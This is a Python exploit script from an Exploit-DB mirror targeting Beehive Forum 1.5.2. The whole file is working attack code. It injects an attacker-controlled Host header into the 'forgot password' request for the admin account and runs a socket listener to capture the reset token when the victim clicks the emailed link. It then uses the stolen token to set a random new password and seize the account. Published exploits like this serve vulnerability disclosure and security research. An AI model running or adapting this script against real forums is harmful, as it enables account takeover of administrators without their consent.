exploit-db-mirror/exploits/php/webapps/50923.py

# Exploit Title: Beehive Forum - Account Takeover
# Date:08/05/2022.
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.beehiveforum.co.uk/
# Software Link: https://sourceforge.net/projects/beehiveforum/
# Version: 1.5.2
# Tested on: Kali Linux and Ubuntu 20.0.4
# CVE N/A
# PoC: https://imgur.com/a/hVlgpCg

# Vulnerability: In the functionality "forgot password", it's possible to
modify the Header "Host", #injecting malicious host, allowing stealing the
token and resetting the password from a victim.#(Requires user interaction)

import requests
from bs4 import BeautifulSoup
import socket
import sys
import urllib.parse
import random
import string

endpoint = sys.argv[1]
lhost = sys.argv[2]
lport = int(sys.argv[3])
hostheader = f'{lhost}:{lport}'
url_forgot = f'http://{endpoint}/forum/forgot_pw.php'
url_change = f'http://{endpoint}/forum/change_pw.php'

def init_req():
    session = requests.Session()
    r = session.get(url_forgot)
    cookie = session.cookies.get_dict()
    cookie = cookie['sess_hash']
    soup = BeautifulSoup(r.text, 'lxml')
    hash_request = soup.input['id']
    csrf_token = soup.input['value']
    return hash_request, csrf_token, cookie

def forgot_req(hash_request: str, csrf_token: str, cookie: str):

    headers= {
        'Host': hostheader,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0)
Gecko/20100101 Firefox/97.0',
        'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',
        'Cookie' : 'sess_hash=' + cookie
    }

    data = {
        hash_request : csrf_token,
        'webtag' : 'TEST',
        'logon' : 'admin',
        'request' : 'Request'
    }

    r = requests.post(url_forgot, headers=headers, data=data)
    if('You should shortly receive an e-mail containing instructions for
resetting your password' in r.text):
        print('')
        print('[*] A mail has been sent to the victim')
        socket_req()
    else:
        print('[*] The mail has not been sent')

def socket_req():

    print(f"[*] Listening on port {lport}...." )
    print('[*] Waitting the victim clicks in the malicious link\n')
    s = socket.socket()
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((lhost, lport))
    s.listen()
    (sock_c, _) = s.accept()
    get_request = sock_c.recv(4096)
    user_token = urllib.parse.unquote_plus(get_request.split(b"
HTTP")[0][-13:].decode("UTF-8"))

    print("[*] Stole token: " + user_token)
    change_pw(user_token)

def change_pw(user_token: str):
    c = string.ascii_letters + string.digits
    password = ''.join(random.choice(c) for _ in range(6))
    hash_request, csrf_token, cookie = init_req()
    headers= {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0)
Gecko/20100101 Firefox/97.0',
        'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',
        'Cookie' : 'sess_hash=' + cookie
    }
    data = {
        hash_request : csrf_token,
        'webtag' : 'TEST',
        'u' : '1',
        'h' : user_token,
        'pw' : password,
        'cpw' : password,
        'save' : 'Save'
    }

    r = requests.post(url_change, headers=headers, data=data)
    if('Your password has been changed' in r.text):
        print(f'[*] The password has been changed to: {password}')

    else:
        print('[*] The password has been changed')


hash_request, csrf_token, cookie = init_req()
forgot_req(hash_request, csrf_token, cookie)